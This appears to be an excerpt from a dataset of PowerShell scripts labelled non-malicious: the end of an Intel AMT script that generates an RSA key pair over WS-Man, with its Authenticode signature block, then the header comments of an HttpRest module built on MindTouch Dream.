if ($TLS.IsPresent) {
$Port = 16993;
}
else {
$Port = 16992;
}
}
if($CertificateName.Length -gt 0)
{
$wsmanConnectionObject.Options.SetClientCertificateByCertificateName($CertificateName)
}
ForEach ($Comp in $ComputerName)
{
# Attempt Connection with Client
$wsmanConnectionObject.SetHost($Comp, $Port)
if( -not $wsmanConnectionObject)
{
$Results += "Cannot connenct `n"
}
# Generate Key Pair
switch ($KeyAlgorithm)
{
"RSA"
{
$KeyAlgorithmProperty = "0"
break
}
}
$publicKeyManagementServiceRef = $wsmanConnectionObject.NewReference("SELECT * FROM AMT_PublicKeyManagementService WHERE Name='Intel(r) AMT Public Key Management Service'")
$inputObject = $publicKeyManagementServiceRef.CreateMethodInput("GenerateKeyPair")
$inputObject.SetProperty("KeyAlgorithm", $KeyAlgorithmProperty)
$inputObject.SetProperty("KeyLength", $keyLength)
$outputObject = $publicKeyManagementServiceRef.InvokeMethod($inputObject)
$returnValue = $outputObject.GetProperty("ReturnValue")
if($returnValue -like "0")
{
# The key pair data is needed later on in the flow.
# Please note that this KeyPair data is sensitive and should be kept secret, so pay attention to properly protect it in your implementation.
# $publicPrivateKeyPairRef = $outputObject.GetProperty("KeyPair").Ref
# $publicPrivateKeyPairInstance = $publicPrivateKeyPairRef.Get()
# $keyBlob = $publicPrivateKeyPairInstance.GetProperty("DERKey")
$Results += "Key Pair Generated Successfully! `n"
}
elseif($returnValue -like "23") # Max limit reached
{
$Results += "Failed to generate key pair - Max limit was reached. `n"
}
}
}
catch
{
$Results += "Exception Thrown:"
$Results += $_.Exception.Message
}
Write-Output $Results
}
}
# SIG # Begin signature block
# MIIo1wYJKoZIhvcNAQcCoIIoyDCCKMQCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCh1yS9fVqAqwKC
# t7+ZSkapg2i8szQ9P27Q1PU7zBYeIaCCEe8wggWIMIIEcKADAgECAhAK3oEU12eb
# Bm8tst/S9nrCMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAkdCMRswGQYDVQQI
# ExJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoT
# D1NlY3RpZ28gTGltaXRlZDEkMCIGA1UEAxMbU2VjdGlnbyBSU0EgQ29kZSBTaWdu
# aW5nIENBMB4XDTIxMDQwNTAwMDAwMFoXDTIzMDQwNTIzNTk1OVowcDELMAkGA1UE
# BhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFDASBgNVBAcMC1NhbnRhIENsYXJh
# MRowGAYDVQQKDBFJbnRlbCBDb3Jwb3JhdGlvbjEaMBgGA1UEAwwRSW50ZWwgQ29y
# cG9yYXRpb24wggGiMA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQDjUVXd0eS2
# a1cJleh4bp6C5ngpid1fyZl3x1O7UH31slBxqjtjD45nsKBbDATVW/ZH0zqbLQ0P
# pQLpLbBVHEFasianjtLSjFXs1pJJ14rfuZCyiOaFFCGYqb/fLQ2ZBq/0riDFgwfC
# YS80SIV7V+hq+XJhpsUms/5QPqRilRnk+OPlbikQktkUVWi1qN7pkjkC5NgTDLnz
# oxGP3OYA6x+ac3/NMQYnRXzbjACLUq70L2hDC8sDwaCQXavaUG29FF4MjwE8MzMx
# DqcjpZmaO/jbTpExgMBfkDa+vqWSb99gdAeJI/JZXAeuYgGQ+66aIhwmRGsqQIXT
# z4ofo+mRQMgSXatXEOtuBrC5q5GZUnWTTrdfnkdxg0oD9CsttmZg6Fhu5mTLYbJ+
# lKrV/JtSjKNgtQdYXCtnV5FRRzlqcjXqsXG+Q1YaY/n0lTEwCAqJyRMyJLuK/S/U
# MUfPw9BvDQbpyB3ARSD4FJ3glwv9UDKd/BmQ2SVGpS+3/7whm633YIMCAwEAAaOC
# AZAwggGMMB8GA1UdIwQYMBaAFA7hOqhTOjHVir7Bu61nGgOFrTQOMB0GA1UdDgQW
# BBS5qxx6xBgtLKbRn3jrB6dtnHz6VDAOBgNVHQ8BAf8EBAMCB4AwDAYDVR0TAQH/
# BAIwADATBgNVHSUEDDAKBggrBgEFBQcDAzARBglghkgBhvhCAQEEBAMCBBAwSgYD
# VR0gBEMwQTA1BgwrBgEEAbIxAQIBAwIwJTAjBggrBgEFBQcCARYXaHR0cHM6Ly9z
# ZWN0aWdvLmNvbS9DUFMwCAYGZ4EMAQQBMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6
# Ly9jcmwuc2VjdGlnby5jb20vU2VjdGlnb1JTQUNvZGVTaWduaW5nQ0EuY3JsMHMG
# CCsGAQUFBwEBBGcwZTA+BggrBgEFBQcwAoYyaHR0cDovL2NydC5zZWN0aWdvLmNv
# bS9TZWN0aWdvUlNBQ29kZVNpZ25pbmdDQS5jcnQwIwYIKwYBBQUHMAGGF2h0dHA6
# Ly9vY3NwLnNlY3RpZ28uY29tMA0GCSqGSIb3DQEBCwUAA4IBAQBAdvRj4EEZ88QF
# gAGQZABeZB6XbzWNZaFrDGmZMTqREok2QqB6QxdyPSsAFEL5mVfwnD5f8F8iHx+W
# aZXjKHbSvn1f1CAMFMc/i7Byrr984Obp2raebwFNRUO7l2lewLCgkRBlb3+W7Hud
# eTGoTzhJL/Qcvy1jLT0VmhLJbvYjEpBuQ62z7MQH7HltsfjRnDu1RpqKsYWJuCt6
# tOSNn7MZ8vb5nsZEIqRoonucy4Yp1ItP/uXuLc4KcdLh+TzNUiXWWK6qQ6TqeeJp
# Z34IjoS1FvjXLV4ACypUuUvmEIq691NseI4ByVHCZyMa59A6Scpp+kadDUEw0LZj
# t9LGvtWIMIIF9TCCA92gAwIBAgIQHaJIMG+bJhjQguCWfTPTajANBgkqhkiG9w0B
# AQwFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNV
# BAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsx
# LjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw
# HhcNMTgxMTAyMDAwMDAwWhcNMzAxMjMxMjM1OTU5WjB8MQswCQYDVQQGEwJHQjEb
# MBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdTYWxmb3JkMRgw
# FgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJDAiBgNVBAMTG1NlY3RpZ28gUlNBIENv
# ZGUgU2lnbmluZyBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAIYi
# jTKFehifSfCWL2MIHi3cfJ8Uz+MmtiVmKUCGVEZ0MWLFEO2yhyemmcuVMMBW9aR1
# xqkOUGKlUZEQauBLYq798PgYrKf/7i4zIPoMGYmobHutAMNhodxpZW0fbieW15dR
# hqb0J+V8aouVHltg1X7XFpKcAC9o95ftanK+ODtj3o+/bkxBXRIgCFnoOc2P0tbP
# BrRXBbZOoT5Xax+YvMRi1hsLjcdmG0qfnYHEckC14l/vC0X/o84Xpi1VsLewvFRq
# nbyNVlPG8Lp5UEks9wO5/i9lNfIi6iwHr0bZ+UYc3Ix8cSjz/qfGFN1VkW6KEQ3f
# BiSVfQ+noXw62oY1YdMCAwEAAaOCAWQwggFgMB8GA1UdIwQYMBaAFFN5v1qqK0rP
# VIDh2JvAnfKyA2bLMB0GA1UdDgQWBBQO4TqoUzox1Yq+wbutZxoDha00DjAOBgNV
# HQ8BAf8EBAMCAYYwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHSUEFjAUBggrBgEF
# BQcDAwYIKwYBBQUHAwgwEQYDVR0gBAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBD
# oEGGP2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZp
# Y2F0aW9uQXV0aG9yaXR5LmNybDB2BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKG
# M2h0dHA6Ly9jcnQudXNlcnRydXN0LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENB
# LmNydDAlBggrBgEFBQcwAYYZaHR0cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkq
# hkiG9w0BAQwFAAOCAgEATWNQ7Uc0SmGk295qKoyb8QAAHh1iezrXMsL2s+Bjs/th
# AIiaG20QBwRPvrjqiXgi6w9G7PNGXkBGiRL0C3danCpBOvzW9Ovn9xWVM8Ohgyi3
# 3i/klPeFM4MtSkBIv5rCT0qxjyT0s4E307dksKYjalloUkJf/wTr4XRleQj1qZPe
# a3FAmZa6ePG5yOLDCBaxq2NayBWAbXReSnV+pbjDbLXP30p5h1zHQE1jNfYw08+1
# Cg4LBH+gS667o6XQhACTPlNdNKUANWlsvp8gJRANGftQkGG+OY96jk32nw4e/gdR
# EmaDJhlIlc5KycF/8zoFm/lv34h/wCOe0h5DekUxwZxNqfBZslkZ6GqNKQQCd3xL
# S81wvjqyVVp4Pry7bwMQJXcVNIr5NsxDkuS6T/FikyglVyn7URnHoSVAaoRXxrKd
# sbwcCtp8Z359LukoTBh+xHsxQXGaSynsCz1XUNLK3f2eBVHlRHjdAd6xdZgNVCT9
# 8E7j4viDvXK6yz067vBeF5Jobchh+abxKgoLpbn0nu6YMgWFnuv5gynTxix9vTp3
# Los3QqBqgu07SqqUEKThDfgXxbZaeTMYkuO1dfih6Y4KJR7kHvGfWocj/5+kUZ77
# OYARzdu1xKeogG/lU9Tg46LC0lsa+jImLWpXcBw8pFguo/NbSwfcMlnzh6cabVgw
# ggZmMIIETqADAgECAhMzAAAARLc//O9az6J6AAAAAABEMA0GCSqGSIb3DQEBBQUA
# MH8xCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKTAnBgNVBAMT
# IE1pY3Jvc29mdCBDb2RlIFZlcmlmaWNhdGlvbiBSb290MB4XDTE1MDcyMjIxMDM0
# OVoXDTI1MDcyMjIxMDM0OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcg
# SmVyc2V5MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJU
# UlVTVCBOZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRp
# b24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJl
# FzYOw9sIs9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezco
# EStH2jnGvDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+j
# BvGIGGqQIjy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWm
# p2bIcmfbIWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2u
# TIq3XJq0tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnH
# a4xgk97Exwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWax
# KXwyhGNVicQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjN
# hLixP6Q5D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81
# VXQJSdhJWBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10
# Yy+xUGUJ5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrW
# X1Uu6lzGKAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB0DCBzTATBgNVHSUE
# DDAKBggrBgEFBQcDAzASBgNVHRMBAf8ECDAGAQH/AgECMB0GA1UdDgQWBBRTeb9a
# qitKz1SA4dibwJ3ysgNmyzALBgNVHQ8EBAMCAYYwHwYDVR0jBBgwFoAUYvsKIVt/
# Q24R2glUUGv10pZx8Z4wVQYDVR0fBE4wTDBKoEigRoZEaHR0cDovL2NybC5taWNy
# b3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljcm9zb2Z0Q29kZVZlcmlmUm9v
# dC5jcmwwDQYJKoZIhvcNAQEFBQADggIBAGsikzw9OVRxZGsO8uQ8MBHFIEpLhg+S
# 8f8zeTrZ5JinDkCgIoB+YbLgpxnPJpUxKmXUak8xhurAxi7FZIw9SFnNCy90PZQm
# ExBC1JeYJ148dtJ4aR0aZOcFcnXg62ZAQ5+PDEb/l2CmyGetEAibYqbpvjqK0wdN
# n3KTJbwGEeAskDg+Zxz9GdeekM49wuDnYazA5QT1HplUDJENAVZxN64n1J5DIqXJ
# J81N5XESOSSlQVaH/7xVFA8lyonux5fl0hP/PX4aoI8/yCzXo3DQx2DA/Ng+UeeX
# xj477c94vorK48Typ6ftnq4IAo+gUttyHtU7w02fjvqbcMf4479sP5Kb5Dc+7GqM
# KfnBor+LPhppZvscY08mAckCxD7S/8NDqBv9mfrUvKW54pMvOwHF0fQ6L2jD4GS3
# WpVeRswHg2m7PAWSVnM1c0WYTnzYEqW3QumiY/ZCYBhw0TtvMcCHx+Zx4fNGFun1
# uHKz6W0fYiZJo0mL3WjHi2hW9978+ockuAOBF4/l8WdqHa7TdPeMpV2zC45CKZbO
# ScR3fmZ8ARcabBQkw7AXdwXYGkC3hmvY5HtArH7fTm8k+SCAgowz5+X6Kdid2otw
# XSvJHYJMC2fLhEGe5wZ+EYNELYoZ7vR/mt15HDcZHp8/jCm6DVwQhjdsSM1FXc1w
# vLzRTV3Yxbh2MYIWPjCCFjoCAQEwgZAwfDELMAkGA1UEBhMCR0IxGzAZBgNVBAgT
# EkdyZWF0ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMP
# U2VjdGlnbyBMaW1pdGVkMSQwIgYDVQQDExtTZWN0aWdvIFJTQSBDb2RlIFNpZ25p
# bmcgQ0ECEAregRTXZ5sGby2y39L2esIwDQYJYIZIAWUDBAIBBQCgfDAQBgorBgEE
# AYI3AgEMMQIwADAZBgkqhkiG9w0BCQMxDAYKKwYBBAGCNwIBBDAcBgorBgEEAYI3
# AgELMQ4wDAYKKwYBBAGCNwIBFTAvBgkqhkiG9w0BCQQxIgQg8mX+C/NOvT0oi9dH
# CIzg8heKTjpwn6oo+NAItSy7/V0wDQYJKoZIhvcNAQEBBQAEggGAmzS1vGx7JiAb
# H7CVS3HRTCCFc26djZvQzpBvdHsPQ8trMPllxuXsSI3vPDHXQ8DveDXh992/I2bF
# Wqszhktlm5D2S05oQOTkIhlGNYaPS7L7d6Y8nE5aCjpUMUgKefNPT6URbURIxCHI
# jmgzWi2HJJvvNv+jSTPklDVE2rklBN2o204YSsmwERrUI+2C8Cf1Td7Je+pDOnVy
# 2hRMTXP1lGyhQvXqrAg39S0G0Ap2Kvn0Mcj7JYy6/xoCCeiZRFlp0vNmHPx66Rbx
# 7QWic6zxotNuZNwMcGRZMMTtxltIsxCN8PPWKF23wy9fBZmx+Mv6GaLLA+vsrRT6
# YP4HZK2deMbAYMH4Yb27NxDkt15CWjlwZxCMDMfaoJVDAxT561b83gYB0IiZ3v37
# LOjMtaqzlwYQGBg+a/yUPM/xkiZ77veft6EnF7X9QP0Gbz1asjHPFaB2k39KDtCc
# y9squJ7oK5sFD339Xh84Kh6vgVfZ9bBG7U+9rb841Ur2NSD53czkoYITgDCCE3wG
# CisGAQQBgjcDAwExghNsMIITaAYJKoZIhvcNAQcCoIITWTCCE1UCAQMxDzANBglg
# hkgBZQMEAgIFADCCAQ0GCyqGSIb3DQEJEAEEoIH9BIH6MIH3AgEBBgorBgEEAbIx
# AgEBMDEwDQYJYIZIAWUDBAIBBQAEIKmkoabGlEtjoAPo1Z0dHbFuA7m3d/uWN+yy
# vNR7sacUAhUAl3kU5TcqC14TvOaN0pq0o3YnFXAYDzIwMjEwNzE5MTYzMDUzWqCB
# iqSBhzCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIgTWFuY2hlc3Rl
# cjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBMaW1pdGVkMSww
# KgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25lciAjMqCCDfsw
# ggcHMIIE76ADAgECAhEAjHegAI/00bDGPZ86SIONazANBgkqhkiG9w0BAQwFADB9
# MQswCQYDVQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD
# VQQHEwdTYWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMT
# HFNlY3RpZ28gUlNBIFRpbWUgU3RhbXBpbmcgQ0EwHhcNMjAxMDIzMDAwMDAwWhcN
# MzIwMTIyMjM1OTU5WjCBhDELMAkGA1UEBhMCR0IxGzAZBgNVBAgTEkdyZWF0ZXIg
# TWFuY2hlc3RlcjEQMA4GA1UEBxMHU2FsZm9yZDEYMBYGA1UEChMPU2VjdGlnbyBM
# aW1pdGVkMSwwKgYDVQQDDCNTZWN0aWdvIFJTQSBUaW1lIFN0YW1waW5nIFNpZ25l
# ciAjMjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAJGHSyyLwfEeoJ7T
# B8YBylKwvnl5XQlmBi0vNX27wPsn2kJqWRslTOrvQNaafjLIaoF9tFw+VhCBNToi
# Noz7+CAph6x00BtivD9khwJf78WA7wYc3F5Ok4e4mt5MB06FzHDFDXvsw9njl+nL
# GdtWRWzuSyBsyT5s/fCb8Sj4kZmq/FrBmoIgOrfv59a4JUnCORuHgTnLw7c6zZ9Q
# BB8amaSAAk0dBahV021SgIPmbkilX8GJWGCK7/GszYdjGI50y4SHQWljgbz2H6p8
# 18FBzq2rdosggNQtlQeNx/ULFx6a5daZaVHHTqadKW/neZMNMmNTrszGKYogwWDG
# 8gIsxPnIIt/5J4Khg1HCvMmCGiGEspe81K9EHJaCIpUqhVSu8f0+SXR0/I6uP6Vy
# 9MNaAapQpYt2lRtm6+/a35Qu2RrrTCd9TAX3+CNdxFfIJgV6/IEjX1QJOCpi1arK
# 3+3PU6sf9kSc1ZlZxVZkW/eOUg9m/Jg/RAYTZG7p4RVgUKWx7M+46MkLvsWE990K
# ndq8KWw9Vu2/eGe2W8heFBy5r4Qtd6L3OZU3b05/HMY8BNYxxX7vPehRfnGtJHQb
# LNz5fKrvwnZJaGLVi/UD3759jg82dUZbk3bEg+6CviyuNxLxvFbD5K1Dw7dmll6U
# Mvqg9quJUPrOoPMIgRrRRKfM97gxAgMBAAGjggF4MIIBdDAfBgNVHSMEGDAWgBQa
# ofhhGSAPw0F3RSiO0TVfBhIEVTAdBgNVHQ4EFgQUaXU3e7udNUJOv1fTmtufAdGu
# 3tAwDgYDVR0PAQH/BAQDAgbAMAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYI
# KwYBBQUHAwgwQAYDVR0gBDkwNzA1BgwrBgEEAbIxAQIBAwgwJTAjBggrBgEFBQcC
# ARYXaHR0cHM6Ly9zZWN0aWdvLmNvbS9DUFMwRAYDVR0fBD0wOzA5oDegNYYzaHR0
# cDovL2NybC5zZWN0aWdvLmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3Js
# MHQGCCsGAQUFBwEBBGgwZjA/BggrBgEFBQcwAoYzaHR0cDovL2NydC5zZWN0aWdv
# LmNvbS9TZWN0aWdvUlNBVGltZVN0YW1waW5nQ0EuY3J0MCMGCCsGAQUFBzABhhdo
# dHRwOi8vb2NzcC5zZWN0aWdvLmNvbTANBgkqhkiG9w0BAQwFAAOCAgEASgN4kEIz
# 7Hsagwk2M5hVu51ABjBrRWrxlA4ZUP9bJV474TnEW7rplZA3N73f+2Ts5YK3lcxX
# VXBLTvSoh90ihaZXu7ghJ9SgKjGUigchnoq9pxr1AhXLRFCZjOw+ugN3poICkMIu
# k6m+ITR1Y7ngLQ/PATfLjaL6uFqarqF6nhOTGVWPCZAu3+qIFxbradbhJb1FCJeA
# 11QgKE/Ke7OzpdIAsGA0ZcTjxcOl5LqFqnpp23WkPnlomjaLQ6421GFyPA6FYg2g
# XnDbZC8Bx8GhxySUo7I8brJeotD6qNG4JRwW5sDVf2gaxGUpNSotiLzqrnTWgufA
# iLjhT3jwXMrAQFzCn9UyHCzaPKw29wZSmqNAMBewKRaZyaq3iEn36AslM7U/ba+f
# XwpW3xKxw+7OkXfoIBPpXCTH6kQLSuYThBxN6w21uIagMKeLoZ+0LMzAFiPJkeVC
# A0uAzuRN5ioBPsBehaAkoRdA1dvb55gQpPHqGRuAVPpHieiYgal1wA7f0GiUeaGg
# no62t0Jmy9nZay9N2N4+Mh4g5OycTUKNncczmYI3RNQmKSZAjngvue76L/Hxj/5Q
# uHjdFJbeHA5wsCqFarFsaOkq5BArbiH903ydN+QqBtbD8ddo408HeYEIE/6yZF7p
# sTzm0Hgjsgks4iZivzupl1HMx0QygbKvz98wggbsMIIE1KADAgECAhAwD2+s3WaY
# dHypRjaneC25MA0GCSqGSIb3DQEBDAUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoTFVRo
# ZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBDZXJ0
# aWZpY2F0aW9uIEF1dGhvcml0eTAeFw0xOTA1MDIwMDAwMDBaFw0zODAxMTgyMzU5
# NTlaMH0xCzAJBgNVBAYTAkdCMRswGQYDVQQIExJHcmVhdGVyIE1hbmNoZXN0ZXIx
# EDAOBgNVBAcTB1NhbGZvcmQxGDAWBgNVBAoTD1NlY3RpZ28gTGltaXRlZDElMCMG
# A1UEAxMcU2VjdGlnbyBSU0EgVGltZSBTdGFtcGluZyBDQTCCAiIwDQYJKoZIhvcN
# AQEBBQADggIPADCCAgoCggIBAMgbAa/ZLH6ImX0BmD8gkL2cgCFUk7nPoD5T77Na
# wHbWGgSlzkeDtevEzEk0y/NFZbn5p2QWJgn71TJSeS7JY8ITm7aGPwEFkmZvIavV
# cRB5h/RGKs3EWsnb111JTXJWD9zJ41OYOioe/M5YSdO/8zm7uaQjQqzQFcN/nqJc
# 1zjxFrJw06PE37PFcqwuCnf8DZRSt/wflXMkPQEovA8NT7ORAY5unSd1VdEXOzQh
# e5cBlK9/gM/REQpXhMl/VuC9RpyCvpSdv7QgsGB+uE31DT/b0OqFjIpWcdEtlEzI
# jDzTFKKcvSb/01Mgx2Bpm1gKVPQF5/0xrPnIhRfHuCkZpCkvRuPd25Ffnz82Pg4w
# ZytGtzWvlr7aTGDMqLufDRTUGMQwmHSCIc9iVrUhcxIe/arKCFiHd6QV6xlV/9A5
# VC0m7kUaOm/N14Tw1/AoxU9kgwLU++Le8bwCKPRt2ieKBtKWh97oaw7wW33pdmmT
# IBxKlyx3GSuTlZicl57rjsF4VsZEJd8GEpoGLZ8DXv2DolNnyrH6jaFkyYiSWcuo
# RsDJ8qb/fVfbEnb6ikEk1Bv8cqUUotStQxykSYtBORQDHin6G6UirqXDTYLQjdpr
# t9v3GEBXc/Bxo/tKfUU2wfeNgvq5yQ1TgH36tjlYMu9vGFCJ10+dM70atZ2h3pVB
# eqeDAgMBAAGjggFaMIIBVjAfBgNVHSMEGDAWgBRTeb9aqitKz1SA4dibwJ3ysgNm
# yzAdBgNVHQ4EFgQUGqH4YRkgD8NBd0UojtE1XwYSBFUwDgYDVR0PAQH/BAQDAgGG
# MBIGA1UdEwEB/wQIMAYBAf8CAQAwEwYDVR0lBAwwCgYIKwYBBQUHAwgwEQYDVR0g
# BAowCDAGBgRVHSAAMFAGA1UdHwRJMEcwRaBDoEGGP2h0dHA6Ly9jcmwudXNlcnRy
# dXN0LmNvbS9VU0VSVHJ1c3RSU0FDZXJ0aWZpY2F0aW9uQXV0aG9yaXR5LmNybDB2
# BggrBgEFBQcBAQRqMGgwPwYIKwYBBQUHMAKGM2h0dHA6Ly9jcnQudXNlcnRydXN0
# LmNvbS9VU0VSVHJ1c3RSU0FBZGRUcnVzdENBLmNydDAlBggrBgEFBQcwAYYZaHR0
# cDovL29jc3AudXNlcnRydXN0LmNvbTANBgkqhkiG9w0BAQwFAAOCAgEAbVSBpTNd
# FuG1U4GRdd8DejILLSWEEbKw2yp9KgX1vDsn9FqguUlZkClsYcu1UNviffmfAO9A
# w63T4uRW+VhBz/FC5RB9/7B0H4/GXAn5M17qoBwmWFzztBEP1dXD4rzVWHi/SHbh
# RGdtj7BDEA+N5Pk4Yr8TAcWFo0zFzLJTMJWk1vSWVgi4zVx/AZa+clJqO0I3fBZ4
# OZOTlJux3LJtQW1nzclvkD1/RXLBGyPWwlWEZuSzxWYG9vPWS16toytCiiGS/qhv
# WiVwYoFzY16gu9jc10rTPa+DBjgSHSSHLeT8AtY+dwS8BDa153fLnC6NIxi5o8JH
# HfBd1qFzVwVomqfJN2Udvuq82EKDQwWli6YJ/9GhlKZOqj0J9QVst9JkWtgqIsJL
# nfE5XkzeSD2bNJaaCV+O/fexUpHOP4n2HKG1qXUfcb9bQ11lPVCBbqvw0NP8srMf
# tpmWJvQ8eYtcZMzN7iea5aDADHKHwW5NWtMe6vBE5jJvHOsXTpTDeGUgOw9Bqh/p
# oUGd/rG4oGUqNODeqPk85sEwu8CgYyz8XBYAqNDEf+oRnR4GxqZtMl20OAkrSQeq
# /eww2vGnL8+3/frQo4TZJ577AWZ3uVYQ4SBuxq6x+ba6yDVdM3aO8XwgDCp3rrWi
# Aoa6Ke60WgCxjKvj+QrJVF3UuWp0nr1IrpgxggQtMIIEKQIBATCBkjB9MQswCQYD
# VQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdT
# YWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMTHFNlY3Rp
# Z28gUlNBIFRpbWUgU3RhbXBpbmcgQ0ECEQCMd6AAj/TRsMY9nzpIg41rMA0GCWCG
# SAFlAwQCAgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZI
# hvcNAQkFMQ8XDTIxMDcxOTE2MzA1M1owPwYJKoZIhvcNAQkEMTIEMPVpobA8pjR/
# OjVax28gAJUSdbSKT0Ak+9YUXc5NEef9nJyThrEWF2+JhLz90EnizzCB7QYLKoZI
# hvcNAQkQAgwxgd0wgdowgdcwFgQUlRE3EB2ILzG9UT+UmtpMaK2MCPUwgbwEFALW
# W5Xig3DBVwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEG
# A1UECBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoT
# FVRoZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBD
# ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG
# 9w0BAQEFAASCAgANILJUyUvikvAUqGeAgDkqH69aFwEjHpOkL8xUBQ1hg9biZBfG
# jCjtB90xFT+511zEWeBD16UltA+FwYYD8h5gL4Mo1FbhADyzCDkG0acCUMkiz23H
# EmUpH3HleStfhABM7Isql3DWHYm+cEIBwqukHpKF74U+juWq99ZuupfiVeJz0KU1
# YeqFmrPUl2Y4k98kaHfzEE7pKZDUsBUlBpzK0UVMmmOL3bBnfjmI/vR/pjO3f/96
# OT7S7N302sgKi9AnXPSoEBSTMXha8NqUxBJbjjw4tPXDDgwaUWC+wQ1WXDpEBbsD
# aghR//dQWcHGmHwKYOo+Qm2HxJihOCx0nqaZvPweCf3A04lpC3lKPI7OInMUSK62
# 2qkFOW1DTyLgGRRIHULB0BO67EdqVX3q72lR+MTQFzQerF7ROl0ZNwD6Wp0u8B6g
# ClYouZ58bf1G0GkSQWFRXOemqlG6rmOvVZTJLhXiQFoJr49UTEnCROwKEEA2u42O
# EV7rxVbeeIiNJQFUs/CWuF8keNCD5IwknWV84x3WXFNDp3nIpq9HhOg5/k7e62Ku
# nm4OgfkR1Utr/xMHoZyQjsak/5B20zd2CvD7d7oz10HqIxKtBw4sFvdpunS/4O9L
# JqJn0gBcUOXkF25QuAx+OjC16/y5ZpZVbvsEjKxQYowaVrQZmNfG3/OOnQ==
# SIG # End signature block
|
combined_dataset/train/non-malicious/HttpRest 1.0.2.ps1
|
HttpRest 1.0.2.ps1
|
## Http Rest
####################################################################################################
## The first implementation of the HttpRest module, as a bunch of script functions
## Based on the REST api from MindTouch's Dream SDK
##
## INSTALL:
## You need log4net.dll mindtouch.core.dll mindtouch.dream.dll and SgmlReaderDll.dll from the SDK
## Download DREAM from http`://sourceforge.net/project/showfiles.php?group_id=173074
## Unpack it, and you can find these dlls in the "dist" folder.
## Make sure to put them in the folder with the module.
##
## For documentation of Dream: http`://wiki.developer.mindtouch.com/Dream
####################################################################################################
## Version History
## 1.0 First Release
## 1.0.1 Added Get-WebPageContent
